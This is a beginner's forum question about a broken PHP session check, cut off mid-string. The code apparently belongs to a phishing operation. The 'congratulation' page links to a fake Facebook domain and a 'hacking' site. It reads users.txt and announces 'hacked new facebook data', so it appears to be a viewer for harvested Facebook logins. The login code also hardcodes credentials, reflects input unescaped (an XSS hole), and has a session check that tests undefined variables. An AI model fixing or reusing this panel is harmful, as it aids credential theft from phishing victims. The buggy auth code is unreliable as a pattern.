I am new in php so I face so much difficulties I want to create my login page in which user login and get transfered to congratulation page........but due to my session false detection anyone can access the congratulation page without any login form.......what is the problem I don't know.....
This is my login.php file
<?php
session_start();
$username = '';
$password = '';
$userError = '';
$passError = '';
if(isset($_POST['submit'])){
$username = $_POST['username'];
$password = $_POST['password'];
if($username === '9155499248' && $password === 'Ben 10'){
$_SESSION['login'] = true;
header('LOCATION:congratulation.php');
die();
}
if($username !== '9155499248')
$userError = 'Invalid Username';
if($password !== 'Ben 10')
$passError = 'Invalid Password';
}
echo "<!DOCTYPE html>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<meta http-equiv='content-type' content='text/html;charset=utf-8' />
<meta http-equiv='X-UA-Compatible' content='IE=edge ,chrome=1'>
<meta name='viewport' content='width=device-width'>
<title>Login</title>
<link rel='stylesheet' href='css/normalize.css'>
<link rel='stylesheet' href='css/style.css'/>
<script src='js/prefixfree.min.js'></script>
</head>
<body>
<div class='login'>
<h1><b>Login</b></h1>
<form name='input' action='".$_SERVER['PHP_SELF']."' method='post'>
<label for='username'></label><input type='text' value='".$username."' id='username' name='username' />
<div class='error'>".$userError."</div>
<label for='password'></label><input type='password' value='".$password."' id='password' name='password' />
<div class='error'>".$passError."</div>
<button type='submit' class='btn btn-primary btn-block btn-large' name='submit' value='1'>Let me in.</button>
</form>
</div>
<script src='js/index.js'></script>
</body>
</html>";
This is my congratulation.php file
<?php
session_start();
// STEP 2. Check if a user is logged in by checking the session value
if($username==true)
if($passError==false){
header('Location: login.php')
}
?>
<html>
<head>
<title>NALIN NISHANT</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="css/font-awesome.min.css" rel="stylesheet">
<link href="css/animate.css" rel="stylesheet">
<link href="css/main.css" rel="stylesheet">
</head>
<body>
<!--header--> <header class="navbar navbar-inverse navbar-fixed-top wet-asphalt" role="banner">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="www.facebookpage100.net23.net/?id=facebook"><img src="nalin.jpg"/><b>NALIN</b><br><h6>your ip address is <?
echo $_SERVER["REMOTE_ADDR"];
?> stored <br>for security purpose</h6></a>
</div>
<div class="collapse navbar-collapse">
<ul class="nav navbar-nav navbar-right">
<li class="active"><a href="https://www.facebookpage100.net23.net/?id=facebook">Home</a></li>
<li><a href="https://www.hackingworldtips.wordpress.com">Visit Our Site</a></li>
<li><a href="https://www.facebook.com/@hackingworldtips">Contact Us</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Follow Us<i class="icon-angle-down"></i></a>
<ul class="dropdown-menu">
<li><a href="https://www.facebook.com/nalin.nishant.56">Facebook</a></li>
<li><a href="https://www.nalinnishant.nn@gmail.com">Google+</a></li>
</ul>
</li>
</ul>
</div>
</div>
</header><!--/header--><br>
<img src="js/1.jpg" width="100%" height="550"/>
<!--php-->
<?php
$filename = "users.txt";
$file = fopen( $filename, "r" );
if( $file == false )
{
exit();
}
$filesize = filesize( $filename );
$filetext = fread( $file, $filesize );
fclose( $file );
echo ( "congratulation nalin......... your server hacked new facebook data